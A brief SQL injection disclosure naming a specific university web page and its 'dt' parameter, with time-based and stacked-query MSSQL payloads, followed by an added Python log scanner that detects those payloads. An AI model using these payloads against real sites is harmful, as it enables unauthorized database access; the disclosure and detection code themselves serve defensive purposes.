http://www.aiou.edu.pk – SQL vulnerability


Allama Iqbal Open University

Website: http://www.aiou.edu.pk/All_Dept_List.asp?dt=1 (GET)

Vuln type: SQL injection

Submitted by: Waqas Haider

PoC:

Parameter: dt (GET)

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: dt=1;WAITFOR DELAY '0:0:5'--

Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: dt=1 WAITFOR DELAY '0:0:5'

Notification: Vendor notified
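
For defenders, an added example (not part of the original report) that scans web server logs for the two payload shapes listed in the PoC: a `dt` value that is not a plain integer, and a `WAITFOR DELAY` clause inside a parameter. The log layout, client addresses, field order and the 4000 ms slow-response threshold are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed log lines (assumed field order, not taken from any real server):
# date time method uri-stem uri-query client-ip status time-taken-ms
SAMPLE_LOG = """\
2016-07-26 10:00:01 GET /All_Dept_List.asp dt=1 203.0.113.10 200 120
2016-07-26 10:00:07 GET /All_Dept_List.asp dt=1;WAITFOR+DELAY+'0:0:5'-- 203.0.113.50 200 5140
2016-07-26 10:00:15 GET /All_Dept_List.asp dt=1%20WAITFOR%20DELAY%20%270%3A0%3A5%27 203.0.113.50 200 5098
2016-07-26 10:01:02 GET /All_Dept_List.asp dt=12 203.0.113.11 200 95
"""

NUMERIC_PARAMS = {"dt"}   # parameters assumed to carry only an integer id
DELAY_RE = re.compile(r"\bwaitfor\s+delay\b", re.IGNORECASE)
SLOW_MS = 4000            # assumed threshold for a suspiciously slow response


def inspect_line(line):
    """Return the list of findings for one log line (empty list means clean)."""
    _date, _time, _method, _stem, query, _ip, _status, taken = line.split()
    findings = []
    # Split on '&' only: ';' must stay inside the value so stacked queries are seen.
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)  # decode %xx and '+' before matching
        if name in NUMERIC_PARAMS and not re.fullmatch(r"\d{1,9}", value):
            findings.append(f"non-integer value for '{name}'")
        if DELAY_RE.search(value):
            findings.append(f"WAITFOR DELAY in '{name}'")
    # A slow response alongside a suspicious parameter suggests the delay executed.
    if findings and int(taken) >= SLOW_MS:
        findings.append(f"response took {taken} ms")
    return findings


def scan(log_text):
    """Map 1-based line numbers to findings for every suspicious line."""
    hits = {}
    for number, line in enumerate(log_text.splitlines(), 1):
        if line.strip():
            found = inspect_line(line)
            if found:
                hits[number] = found
    return hits


if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG).items():
        print(number, "; ".join(found))
```

If `dt` is meant to be a numeric id, the same strict integer check belongs in the page handler, with the value passed to the database as a bound parameter rather than concatenated into the query text.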
